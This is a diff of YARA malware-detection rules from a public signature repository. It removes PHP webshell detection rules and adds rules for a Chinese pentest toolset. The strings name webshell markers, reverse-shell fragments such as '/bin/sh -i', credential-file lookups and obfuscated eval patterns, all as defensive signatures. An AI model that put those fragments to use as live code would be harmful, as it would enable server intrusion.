-		hash = "ee34d62e136a04e2eaf84b8daa12c9f2233a366af83081a38c3c973ab5e2c40f"
-		logic_hash = "1a29df7465b475e74d0f21f1705405e9663699a6e3c7b7107988ee3e202c3a25"
-		score = 50
-		quality = -386
+		hash = "02ce0980427dea835fc9d9eed025dd26672bf2c15f0b10486ff8107ce3950701"
+		logic_hash = "a7440600ee4826568d465d204e0a602f61752e4ffcfa3b4f29e5bc81c4d67b46"
+		score = 70
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		version = "1.1"
 
 	strings:
-		$dex1 = "dex\n0"
-		$dex2 = "dey\n0"
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
-		$new_php2 = "<?php" nocase wide ascii
-		$new_php3 = "<script language=\"php" nocase wide ascii
-		$php_short = "<?"
-		$dynamic1 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\$/ wide ascii
-		$dynamic2 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\("/ wide ascii
-		$dynamic3 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\('/ wide ascii
-		$dynamic4 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(str/ wide ascii
-		$dynamic5 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\)/ wide ascii
-		$dynamic6 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(@/ wide ascii
-		$dynamic7 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(base64_decode/ wide ascii
-		$dynamic8 = "eval(" wide ascii
-		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
-		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
-		$gen_bit_sus6 = "self.delete"
-		$gen_bit_sus9 = "\"cmd /c" nocase
-		$gen_bit_sus10 = "\"cmd\"" nocase
-		$gen_bit_sus11 = "\"cmd.exe" nocase
-		$gen_bit_sus12 = "%comspec%" wide ascii
-		$gen_bit_sus13 = "%COMSPEC%" wide ascii
-		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
-		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
-		$gen_bit_sus21 = "\"upload\"" wide ascii
-		$gen_bit_sus22 = "\"Upload\"" wide ascii
-		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
-		$gen_bit_sus24 = "fileupload" wide ascii
-		$gen_bit_sus25 = "file_upload" wide ascii
-		$gen_bit_sus27 = "zuncomp" wide ascii
-		$gen_bit_sus28 = "ase6" wide ascii
-		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
-		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
-		$gen_bit_sus30 = "serv-u" wide ascii
-		$gen_bit_sus31 = "Serv-u" wide ascii
-		$gen_bit_sus32 = "Army" fullword wide ascii
-		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
-		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
-		$gen_bit_sus35 = "crack" fullword wide ascii
-		$gen_bit_sus44 = "<pre>" wide ascii
-		$gen_bit_sus45 = "<PRE>" wide ascii
-		$gen_bit_sus46 = "shell_" wide ascii
-		$gen_bit_sus50 = "bypass" wide ascii
-		$gen_bit_sus52 = " ^ $" wide ascii
-		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
-		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
-		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
-		$gen_bit_sus57 = "dumper" wide ascii
-		$gen_bit_sus59 = "'cmd'" wide ascii
-		$gen_bit_sus60 = "\"execute\"" wide ascii
-		$gen_bit_sus61 = "/bin/sh" wide ascii
-		$gen_bit_sus62 = "Cyber" wide ascii
-		$gen_bit_sus63 = "portscan" fullword wide ascii
-		$gen_bit_sus65 = "whoami" fullword wide ascii
-		$gen_bit_sus67 = "$password='" fullword wide ascii
-		$gen_bit_sus68 = "$password=\"" fullword wide ascii
-		$gen_bit_sus69 = "$cmd" fullword wide ascii
-		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
-		$gen_bit_sus71 = "Hacking" fullword wide ascii
-		$gen_bit_sus72 = "hacking" fullword wide ascii
-		$gen_bit_sus73 = ".htpasswd" wide ascii
-		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
-		$gen_bit_sus99 = "$password = " wide ascii
-		$gen_bit_sus100 = "();$" wide ascii
-		$gen_much_sus7 = "Web Shell" nocase
-		$gen_much_sus8 = "WebShell" nocase
-		$gen_much_sus3 = "hidded shell"
-		$gen_much_sus4 = "WScript.Shell.1" nocase
-		$gen_much_sus5 = "AspExec"
-		$gen_much_sus14 = "\\pcAnywhere\\" nocase
-		$gen_much_sus15 = "antivirus" nocase
-		$gen_much_sus16 = "McAfee" nocase
-		$gen_much_sus17 = "nishang"
-		$gen_much_sus18 = "\"unsafe" fullword wide ascii
-		$gen_much_sus19 = "'unsafe" fullword wide ascii
-		$gen_much_sus24 = "exploit" fullword wide ascii
-		$gen_much_sus25 = "Exploit" fullword wide ascii
-		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
-		$gen_much_sus30 = "Hacker" wide ascii
-		$gen_much_sus31 = "HACKED" fullword wide ascii
-		$gen_much_sus32 = "hacked" fullword wide ascii
-		$gen_much_sus33 = "hacker" wide ascii
-		$gen_much_sus34 = "grayhat" nocase wide ascii
-		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
-		$gen_much_sus36 = "Rootkit" wide ascii
-		$gen_much_sus37 = "rootkit" wide ascii
-		$gen_much_sus38 = "/*-/*-*/" wide ascii
-		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
-		$gen_much_sus40 = "\"e\"+\"v" wide ascii
-		$gen_much_sus41 = "a\"+\"l\"" wide ascii
-		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
-		$gen_much_sus43 = "q\"+\"u\"" wide ascii
-		$gen_much_sus44 = "\"u\"+\"e" wide ascii
-		$gen_much_sus45 = "/*//*/" wide ascii
-		$gen_much_sus46 = "(\"/*/\"" wide ascii
-		$gen_much_sus47 = "eval(eval(" wide ascii
-		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
-		$gen_much_sus49 = "Shell.Users" wide ascii
-		$gen_much_sus50 = "PasswordType=Regular" wide ascii
-		$gen_much_sus51 = "-Expire=0" wide ascii
-		$gen_much_sus60 = "_=$$_" wide ascii
-		$gen_much_sus61 = "_=$$_" wide ascii
-		$gen_much_sus62 = "++;$" wide ascii
-		$gen_much_sus63 = "++; $" wide ascii
-		$gen_much_sus64 = "_.=$_" wide ascii
-		$gen_much_sus70 = "-perm -04000" wide ascii
-		$gen_much_sus71 = "-perm -02000" wide ascii
-		$gen_much_sus72 = "grep -li password" wide ascii
-		$gen_much_sus73 = "-name config.inc.php" wide ascii
-		$gen_much_sus75 = "password crack" wide ascii
-		$gen_much_sus76 = "mysqlDll.dll" wide ascii
-		$gen_much_sus77 = "net user" wide ascii
-		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
-		$gen_much_sus81 = /strrev\(['"]/ wide ascii
-		$gen_much_sus82 = "PHPShell" fullword wide ascii
-		$gen_much_sus821 = "PHP Shell" fullword wide ascii
-		$gen_much_sus83 = "phpshell" fullword wide ascii
-		$gen_much_sus84 = "PHPshell" fullword wide ascii
-		$gen_much_sus87 = "deface" wide ascii
-		$gen_much_sus88 = "Deface" wide ascii
-		$gen_much_sus89 = "backdoor" wide ascii
-		$gen_much_sus90 = "r00t" fullword wide ascii
-		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
-		$gen_much_sus92 = "DEFACE" fullword wide ascii
-		$gen_much_sus93 = "Bypass" fullword wide ascii
-		$gen_much_sus94 = /eval\s{2,20}\(/ nocase wide ascii
-		$gen_much_sus100 = "rot13" wide ascii
-		$gen_much_sus101 = "ini_set('error_log'" wide ascii
-		$gen_much_sus102 = "base64_decode(base64_decode(" wide ascii
-		$gen_much_sus103 = "=$_COOKIE;" wide ascii
-		$gen_much_sus104 = { C0 A6 7B 3? 7D 2E 24 }
-		$gen_much_sus105 = "$GLOBALS[\"__" wide ascii
-		$gen_much_sus106 = ")-0)" wide ascii
-		$gen_much_sus107 = "-0)+" wide ascii
-		$gen_much_sus108 = "+0)+" wide ascii
-		$gen_much_sus109 = "+(0/" wide ascii
-		$gen_much_sus110 = "+(0+" wide ascii
-		$gen_much_sus111 = "extract($_REQUEST)" wide ascii
-		$gen_much_sus112 = "<?php\t\t\t\t\t\t\t\t\t\t\t" wide ascii
-		$gen_much_sus113 = "\t\t\t\t\t\t\t\t\t\t\textract" wide ascii
-		$gen_much_sus114 = "\" .\"" wide ascii
-		$gen_much_sus115 = "end($_POST" wide ascii
-		$weevely1 = /';\n\$\w\s?=\s?'/ wide ascii
-		$weevely2 = /';\x0d\n\$\w\s?=\s?'/ wide ascii
-		$weevely3 = /';\$\w{1,2}='/ wide ascii
-		$weevely4 = "str_replace" fullword wide ascii
-		$gif = { 47 49 46 38 }
-		$fp1 = "# Some examples from obfuscated malware:" ascii
-		$fp2 = "* @package   PHP_CodeSniffer" ascii
-		$fp3 = ".jQuery===" ascii
-		$fp4 = "* @param string $lstat encoded LStat string" ascii
-		$fp5 = "' => array('horde:"
-		$fp6 = "$messages['fileuploaderror'] = '"
+		$a1 = ", PublicKeyToken="
+		$a2 = ".NETFramework,Version="
+		$csharp = "Microsoft.CSharp"
+		$vbnet = "Microsoft.VisualBasic"
+		$strreverse = "StrReverse"
 
 	condition:
-		not ( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x3c3f786d or uint32be( 0 ) == 0x3c3f584d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 or 1 of ( $fp* ) ) and ( any of ( $new_php* ) or $php_short at 0 ) and ( any of ( $dynamic* ) ) and ( $gif at 0 or ( ( filesize < 1KB and ( 1 of ( $gen_much_sus* ) ) ) or ( filesize < 2KB and ( ( #weevely1 + #weevely2 + #weevely3 ) > 2 and #weevely4 > 1 ) ) or ( filesize < 4000 and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 3 of ( $gen_much_sus* ) or 5 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 3 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 160KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) or ( math.deviation ( 500 , filesize -500 , 89.0 ) > 70 ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) or #gen_much_sus104 > 4 ) ) ) or ( filesize > 2KB and filesize < 1MB and ( ( math.entropy ( 500 , filesize -500 ) >= 5.7 and math.mean ( 500 , filesize -500 ) > 80 and math.deviation ( 500 , filesize -500 , 89.0 ) < 23 ) or ( math.entropy ( 500 , filesize -500 ) >= 7.7 and math.mean ( 500 , filesize -500 ) > 120 and math.mean ( 500 , filesize -500 ) < 136 and math.deviation ( 500 , filesize -500 , 89.0 ) > 65 ) ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 50MB and all of ( $a* ) and $csharp and $vbnet and $strreverse
 }
-
-rule SIGNATURE_BASE_WEBSHELL_PHP_Encoded_Big : FILE
+rule SIGNATURE_BASE_CN_Honker_MAC_IPMAC : FILE
 {
 	meta:
-		description = "PHP webshell using some kind of eval with encoded blob to decode, which is checked with YARAs math.entropy module"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c3bb7b8b-c554-5802-8955-c83722498f8b"
-		date = "2021-02-07"
-		modified = "2024-12-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2347-L2433"
+		description = "Sample from CN Honker Pentest Toolset - file IPMAC.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5424d3a7-765a-5dfb-9177-d5633f83079f"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1d4b374d284c12db881ba42ee63ebce2759e0b14"
-		hash = "fc0086caee0a2cd20609a05a6253e23b5e3245b8"
-		hash = "b15b073801067429a93e116af1147a21b928b215"
-		hash = "74c92f29cf15de34b8866db4b40748243fb938b4"
-		hash = "042245ee0c54996608ff8f442c8bafb8"
-		logic_hash = "9c995f9c1c5e3a70dbb8170f6d1a2fba51c0f29184a5d3647016b520f4bfc0e3"
-		score = 50
-		quality = -100
+		hash = "24d55b6bec5c9fff4cd6f345bacac7abadce1611"
+		logic_hash = "395dfb840346bbf3f68fa198e76349cf65c703b28fd168b85d846d07df1845fe"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$new_php1 = /<\?=[\w\s@$]/ wide ascii
-		$new_php2 = "<?php" nocase wide ascii
-		$new_php3 = "<script language=\"php" nocase wide ascii
-		$php_short = "<?"
-		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
-		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
-		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
-		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
+		$s1 = "Http://Www.YrYz.Net" fullword wide
+		$s2 = "IpMac.txt" fullword ascii
+		$s3 = "192.168.0.1" fullword ascii
 
 	condition:
-		filesize < 1000KB and ( any of ( $new_php* ) or $php_short at 0 ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( filesize > 2KB and ( math.entropy ( 500 , filesize -500 ) >= 5.7 and math.mean ( 500 , filesize -500 ) > 80 and math.deviation ( 500 , filesize -500 , 89.0 ) < 24 ) or ( math.entropy ( 500 , filesize -500 ) >= 7.7 and math.mean ( 500 , filesize -500 ) > 120 and math.mean ( 500 , filesize -500 ) < 136 and math.deviation ( 500 , filesize -500 , 89.0 ) > 65 ) )
+		uint16( 0 ) == 0x5a4d and filesize < 267KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Backticks : FILE
+rule SIGNATURE_BASE_CN_Honker_Getsyskey : FILE
 {
 	meta:
-		description = "Generic PHP webshell which uses backticks directly on user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b2f1d8d0-8668-5641-8ce9-c8dd71f51f58"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2435-L2483"
+		description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "08f5b5b1-3085-5bf1-9789-023be5a039f8"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L28-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "339f32c883f6175233f0d1a30510caa52fdcaa37"
-		hash = "8db86ad90883cd208cf86acd45e67c03f994998804441705d690cb6526614d00"
-		hash = "af987b0eade03672c30c095cee0c7c00b663e4b3c6782615fb7e430e4a7d1d75"
-		hash = "67339f9e70a17af16cf51686918cbe1c0604e129950129f67fe445eaff4b4b82"
-		hash = "144e242a9b219c5570973ca26d03e82e9fbe7ba2773305d1713288ae3540b4ad"
-		hash = "8db86ad90883cd208cf86acd45e67c03f994998804441705d690cb6526614d00"
-		logic_hash = "faa064686a5632788497d0300ba017c3e564f3b70f07a01f2e49bf7c934feb28"
-		score = 75
-		quality = 19
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
-
-	strings:
-		$backtick = /`\s*\{?\$(_POST\[|_GET\[|_REQUEST\[|_SERVER\['HTTP_)/ wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		hash = "17cec5e75cda434d0a1bc8cdd5aa268b42633fe9"
+		logic_hash = "1f12ea9d62d4aaf695328fb335445f3dae3996595402586d2ee52098e6727d10"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s2 = "GetSyskey <SYSTEM registry file> [Output system key file]" fullword ascii
+		$s4 = "The system key file \"%s\" is created." fullword ascii
 
 	condition:
-		(( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and $backtick and filesize < 200
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Backticks_OBFUSC : FILE
+rule SIGNATURE_BASE_CN_Honker_Churrasco : FILE
 {
 	meta:
-		description = "Generic PHP webshell which uses backticks directly on user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5ecb329f-0755-536d-8bfa-e36158474a0b"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2485-L2531"
+		description = "Sample from CN Honker Pentest Toolset - file Churrasco.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "58873cd6-0c9e-58a0-923a-aca8a1d42017"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L45-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "23dc299f941d98c72bd48659cdb4673f5ba93697"
-		hash = "e3f393a1530a2824125ecdd6ac79d80cfb18fffb89f470d687323fb5dff0eec1"
-		hash = "1e75914336b1013cc30b24d76569542447833416516af0d237c599f95b593f9b"
-		hash = "8db86ad90883cd208cf86acd45e67c03f994998804441705d690cb6526614d00"
-		logic_hash = "34354283762d6f62a4537e914d969f84546339da9be533e209d8738605b7e3ac"
-		score = 75
-		quality = -6
+		hash = "5a3c935d82a5ff0546eff51bb2ef21c88198f5b8"
+		logic_hash = "f60589bda76367578388cbe6af912c80c9364a7047ed52ca2b4156a1b277e7ca"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$s1 = /echo[\t ]{0,500}\(?`\$/ wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$s0 = "HEAD9 /" ascii
+		$s1 = "logic_er" fullword ascii
+		$s6 = "proggam" fullword ascii
+		$s16 = "DtcGetTransactionManagerExA" fullword ascii
+		$s17 = "GetUserNameA" fullword ascii
+		$s18 = "OLEAUT" fullword ascii
 
 	condition:
-		filesize < 500 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and $s1
+		uint16( 0 ) == 0x5a4d and filesize < 1276KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_By_String_Known_Webshell : FILE
+rule SIGNATURE_BASE_CN_Honker_Mysql_Injectv1_1_Creak : FILE
 {
 	meta:
-		description = "Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions."
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "05ac0e0a-3a19-5c60-b89a-4a300d8c22e7"
-		date = "2021-01-09"
-		modified = "2025-08-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2533-L2669"
+		description = "Sample from CN Honker Pentest Toolset - file mysql_injectV1.1_Creak.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "39025a57-557a-53c0-bfdb-81fe83f824af"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L66-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d889da22893536d5965541c30896f4ed4fdf461d"
-		hash = "10f4988a191774a2c6b85604344535ee610b844c1708602a355cf7e9c12c3605"
-		hash = "7b6471774d14510cf6fa312a496eed72b614f6fc"
-		hash = "decda94d40c3fd13dab21e197c8d05f48020fa498f4d0af1f60e29616009e9bf"
-		hash = "ef178d332a4780e8b6db0e772aded71ac1a6ed09b923cc359ba3c4efdd818acc"
-		hash = "a7a937c766029456050b22fa4218b1f2b45eef0db59b414f79d10791feca2c0b"
-		hash = "e7edd380a1a2828929fbde8e7833d6e3385f7652ea6b352d26b86a1e39130ee8"
-		hash = "0038946739956c80d75fa9eeb1b5c123b064bbb9381d164d812d72c7c5d13cac"
-		hash = "3a7309bad8a5364958081042b5602d82554b97eca04ee8fdd8b671b5d1ddb65d"
-		hash = "a78324b9dc0b0676431af40e11bd4e26721a960c55e272d718932bdbb755a098"
-		hash = "a27f8cd10cedd20bff51e9a8e19e69361cc8a6a1a700cc64140e66d160be1781"
-		hash = "9bbd3462993988f9865262653b35b4151386ed2373592a1e2f8cf0f0271cdb00"
-		hash = "459ed1d6f87530910361b1e6065c05ef0b337d128f446253b4e29ae8cc1a3915"
-		hash = "12b34d2562518d339ed405fb2f182f95dce36d08fefb5fb67cc9386565f592d1"
-		hash = "96d8ca3d269e98a330bdb7583cccdc85eab3682f9b64f98e4f42e55103a71636"
-		hash = "312ee17ec9bed4278579443b805c0eb75283f54483d12f9add7d7d9e5f9f6105"
-		hash = "15c4e5225ff7811e43506f0e123daee869a8292fc8a38030d165cc3f6a488c95"
-		hash = "0c845a031e06925c22667e101a858131bbeb681d78b5dbf446fdd5bca344d765"
-		hash = "d52128bcfff5e9a121eab3d76382420c3eebbdb33cd0879fbef7c3426e819695"
-		logic_hash = "8909bf77b7bacdae092fd7a94099224bf1660a6d341e113412e93f864298851b"
+		hash = "a1f066789f48a76023598c5777752c15f91b76b0"
+		logic_hash = "f61557216a7e90ff9655ad8aea4a9adf0e4435c7a3f7958423e46fd2265bad07"
 		score = 70
-		quality = -8
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$pbs1 = "b374k shell" wide ascii
-		$pbs2 = "b374k/b374k" wide ascii
-		$pbs3 = "\"b374k" wide ascii
-		$pbs4 = "$b374k(\"" wide ascii
-		$pbs5 = "b374k " wide ascii
-		$pbs6 = "0de664ecd2be02cdd54234a0d1229b43" wide ascii
-		$pbs7 = "pwnshell" wide ascii
-		$pbs8 = "reGeorg" fullword wide ascii
-		$pbs9 = "Georg says, 'All seems fine" fullword wide ascii
-		$pbs10 = "My PHP Shell - A very simple web shell" wide ascii
-		$pbs11 = "<title>My PHP Shell <?echo VERSION" wide ascii
-		$pbs12 = "F4ckTeam" fullword wide ascii
-		$pbs15 = "MulCiShell" fullword wide ascii
-		$pbs30 = "bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww" wide ascii
-		$pbs35 = /@\$_GET\s?\[\d\]\)\.@\$_\(\$_GET\s?\[\d\]\)/ wide ascii
-		$pbs36 = /@\$_GET\s?\[\d\]\)\.@\$_\(\$_POST\s?\[\d\]\)/ wide ascii
-		$pbs37 = /@\$_POST\s?\[\d\]\)\.@\$_\(\$_GET\s?\[\d\]\)/ wide ascii
-		$pbs38 = /@\$_POST\[\d\]\)\.@\$_\(\$_POST\[\d\]\)/ wide ascii
-		$pbs39 = /@\$_REQUEST\[\d\]\)\.@\$_\(\$_REQUEST\[\d\]\)/ wide ascii
-		$pbs42 = "array(\"find config.inc.php files\", \"find / -type f -name config.inc.php\")" wide ascii
-		$pbs43 = "$_SERVER[\"\\x48\\x54\\x54\\x50" wide ascii
-		$pbs52 = "preg_replace(\"/[checksql]/e\""
-		$pbs53 = "='http://www.zjjv.com'"
-		$pbs54 = "=\"http://www.zjjv.com\""
-		$pbs60 = /setting\["AccountType"\]\s?=\s?3/
-		$pbs61 = "~+d()\"^\"!{+{}"
-		$pbs62 = "use function \\eval as "
-		$pbs63 = "use function \\assert as "
-		$pbs64 = "eval(`/*" wide ascii
-		$pbs65 = "/* Reverse engineering of this file is strictly prohibited. File protected by copyright law and provided under license. */" wide ascii
-		$pbs66 = "Tas9er" fullword wide ascii
-		$pbs67 = "\"TSOP_\";" fullword wide ascii
-		$pbs68 = "str_rot13('nffreg')" wide ascii
-		$pbs69 = "<?=`{$'" wide ascii
-		$pbs70 = "{'_'.$_}[\"_\"](${'_'.$_}[\"_" wide ascii
-		$pbs71 = "\"e45e329feb5d925b\"" wide ascii
-		$pbs72 = "| PHP FILE MANAGER" wide ascii
-		$pbs73 = "\neval(htmlspecialchars_decode(gzinflate(base64_decode($" wide ascii
-		$pbs74 = "/*\n\nShellindir.org\n\n*/" wide ascii
-		$pbs75 = "$shell = 'uname -a; w; id; /bin/sh -i';" wide ascii
-		$pbs76 = "'password' . '/' . 'id' . '/' . " wide ascii
-		$pbs77 = "= create_function /*" wide ascii
-		$pbs78 = "W3LL M!N! SH3LL" wide ascii
-		$pbs79 = "extract($_REQUEST)&&@$" wide ascii
-		$pbs80 = "\"P-h-p-S-p-y\"" wide ascii
-		$pbs81 = "\\x5f\\x72\\x6f\\x74\\x31\\x33" wide ascii
-		$pbs82 = "\\x62\\x61\\x73\\x65\\x36\\x34\\x5f" wide ascii
-		$pbs83 = "*/base64_decode/*" wide ascii
-		$pbs84 = "\n@eval/*" wide ascii
-		$pbs85 = "*/eval/*" wide ascii
-		$pbs86 = "*/ array /*" wide ascii
-		$pbs87 = "2jtffszJe" wide ascii
-		$pbs88 = "edocne_46esab" wide ascii
